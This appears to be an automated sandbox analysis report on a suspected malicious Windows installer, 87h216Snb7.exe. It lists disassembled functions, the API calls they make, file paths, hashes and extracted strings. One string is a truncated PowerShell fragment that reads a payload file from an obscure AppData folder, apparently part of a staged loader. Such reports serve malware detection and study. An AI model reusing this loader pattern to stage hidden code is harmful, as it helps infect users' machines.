Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08

Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19

Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010

Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
Opcode Fuzzy Hash: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

Non-executed Functions

Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A00
SetWindowTextW.USER32(00000000,?), ref: 00404A2A
SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
CoTaskMemFree.OLE32(00000000), ref: 00404AE6
lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36

Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98

Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
Part of subcall function 004067EF: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879

GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14

Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00404B01
"$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta, xrefs: 004049CA
A, xrefs: 00404AD4
: Completed, xrefs: 00404B12, 00404B17, 00404B22

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta$: Completed$A$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
API String ID: 2624150263-529700157
Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D

Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F45
GetDlgItem.USER32(?,00000408), ref: 00404F50
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
SendMessageW.USER32(?,00001109,00000002), ref: 00405006
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
DeleteObject.GDI32(00000000), ref: 00405027
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129

Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
GetWindowLongW.USER32(?,000000F0), ref: 0040516B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
ShowWindow.USER32(?,00000005), ref: 00405189
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
ImageList_Destroy.COMCTL32(00000000), ref: 00405357
GlobalFree.KERNEL32(00000000), ref: 00405367
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
SendMessageW.USER32(?,00001102,?,?), ref: 00405489
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
ShowWindow.USER32(?,00000000), ref: 00405511
GetDlgItem.USER32(?,000003FE), ref: 0040551C
ShowWindow.USER32(00000000), ref: 00405523

Strings

N, xrefs: 004051C2
M, xrefs: 004050E1
, xrefs: 004054FB

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18

Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
GetDlgItem.USER32(?,000003E8), ref: 00404731
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
GetSysColor.USER32(?), ref: 0040475F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
lstrlenW.KERNEL32(?), ref: 00404780
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
GetDlgItem.USER32(?,0000040A), ref: 004047FB
SendMessageW.USER32(00000000), ref: 00404802
GetDlgItem.USER32(?,000003E8), ref: 0040482D
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
SetCursor.USER32(00000000), ref: 00404881
LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
SetCursor.USER32(00000000), ref: 0040489D
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE

Strings

: Completed, xrefs: 0040485C
N, xrefs: 0040481B

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4

Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB

Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8

GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
wsprintfA.USER32 ref: 00406206
GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
GlobalFree.KERNEL32(00000000), ref: 004062EF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6

Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

Strings

[Rename], xrefs: 00406270, 00406282
%ls=%ls, xrefs: 004061FC

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD

Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
CharNextW.USER32(?,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879

Strings

"C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 00406833
*?|<>/":, xrefs: 00406841
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067F0

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-660138825
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD

Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404544
GetSysColor.USER32(00000000), ref: 00404582
SetTextColor.GDI32(?,00000000), ref: 0040458E
SetBkMode.GDI32(?,?), ref: 0040459A
GetSysColor.USER32(?), ref: 004045AD
SetBkColor.GDI32(?,?), ref: 004045BD
DeleteObject.GDI32(?), ref: 004045D7
CreateBrushIndirect.GDI32(?), ref: 004045E1

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54

Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1

Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D

Strings

9, xrefs: 00402760

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
